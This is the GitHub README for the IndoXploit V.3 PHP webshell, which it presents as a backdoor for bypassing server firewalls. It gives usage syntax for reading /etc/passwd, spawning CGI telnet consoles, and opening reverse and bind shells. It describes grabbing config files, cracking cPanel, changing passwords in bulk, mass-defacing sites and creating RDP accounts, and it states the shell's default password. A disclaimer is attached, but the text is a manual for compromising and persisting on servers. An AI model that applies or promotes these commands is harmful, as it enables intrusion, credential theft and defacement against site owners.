/README.md

https://github.com/linuxsec/indoxploit-shell · Markdown · 111 lines · 90 code · 21 blank · 0 comment · 0 complexity · a39da2572672e5c094b0c3887a3b700f MD5 · raw file

  1. # IndoXploit Webshell V.3
  2. IndoXploit webshell V.3 is an PHP based webshell or backdoor with unique and usefull features. This webshell is originally coded by [**agussetyar**](https://github.com/agussetyar) from **IndoXploit Coders Team**. IndoXploit Shell has been mentioned repeatedly by the coder that it will make you easily bypass server security. With this shell you can comfortably bypass the server firewall from most secure servers. It is one of the hacker's most preferred backdoor shell.
  3. **Usage of indoxploit shell for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program**
  4. ---
  5. ## Screenshot
  6. - login
  7. ![idx](https://raw.githubusercontent.com/linuxsec/indoxploit-shell/master/screenshot/indoxploit-login.PNG "Login Shell")
  8. Default Password : **IndoXploit**
  9. - interface
  10. ![idx](https://raw.githubusercontent.com/linuxsec/indoxploit-shell/master/screenshot/idx-interface.PNG "Shell Interface")
  11. Webshell Interface
  12. ## Features
  13. - Mass Password Change
  14. - Fake Root
  15. - Cpanel Crack
  16. - Mass Deface/Delete File
  17. - Zone-H Mass Submit
  18. ## How to Use
  19. - ***Read File***
  20. ~~~
  21. usage: rf [filename]
  22. example: rf /etc/passwd
  23. ~~~
  24. - Spawn File/Tools
  25. ~~~
  26. usage: spawn [name]
  27. ~~~
  28. [name]
  29. - Adminer (adminer)
  30. - WebConsole (webconsole)
  31. - CGI Telnet 1 (cgitelnet1)
  32. - CGI Telnet 2 (cgitelnet2)
  33. - PHPINFO (phpinfo)
  34. example:
  35. ~~~
  36. spawn adminer
  37. spawn webconsole
  38. spawn cgitelnet1
  39. ~~~
  40. - ***Jumping***
  41. ~~~
  42. usage: jumping
  43. ~~~
  44. - ***Config Grabber***
  45. ~~~
  46. usage: idxconfig
  47. ~~~
  48. - ***Symlink***
  49. ~~~
  50. usage: symlink
  51. ~~~
  52. - ***Reverse Shell***
  53. ***[Back Connect]***
  54. ~~~
  55. usage: rvr bc [IP] [PORT] [TYPE]
  56. ~~~
  57. Example:
  58. ~~~
  59. rvr bc 127.0.0.1 1337 bash
  60. rvr bc 127.0.0.1 1337 perl
  61. ~~~
  62. ***Bind Port***
  63. ~~~
  64. usage: rvr bp [PORT] [TYPE]
  65. ~~~
  66. Example:
  67. ~~~
  68. rvr bp 1337 perl
  69. ~~~
  70. - ***KRDP - Create RDP Account (for windows server only)***
  71. ~~~
  72. usage: krdp
  73. ~~~
  74. - ***Logout From Shell***
  75. ~~~
  76. usage: logout
  77. ~~~
  78. - ***Kill Backdoor***
  79. ~~~
  80. usage: killme
  81. ~~~
  82. ## Contribute
  83. Drop an email at **shu@indoxploit.or.id** and tell us what your suggestions about how to improve this webshell.
  84. ## Article
  85. - [Download Shell Backdoor IndoXploit V.3](https://exploit.linuxsec.org/download-shell-backdoor-indoxploit-v-3/)
  86. - [Download Shell backdoor Indoxploit V.2](https://exploit.linuxsec.org/shell-indoxploit-v2-dirilis/)
  87. - [Download IndoXploit WebShell First Edition](https://exploit.linuxsec.org/indoxploit-shell-v1/)
  88. ## Disclaimer
  89. Any actions and or activities related to the material contained within this tool is solely your responsibility.The misuse of the information in this tool can result in criminal charges brought against the persons in question.
  90. Note: modifications, changes, or changes to this code can be accepted, however, every public release that uses this code must be approved by writing this tool (indoxploit team)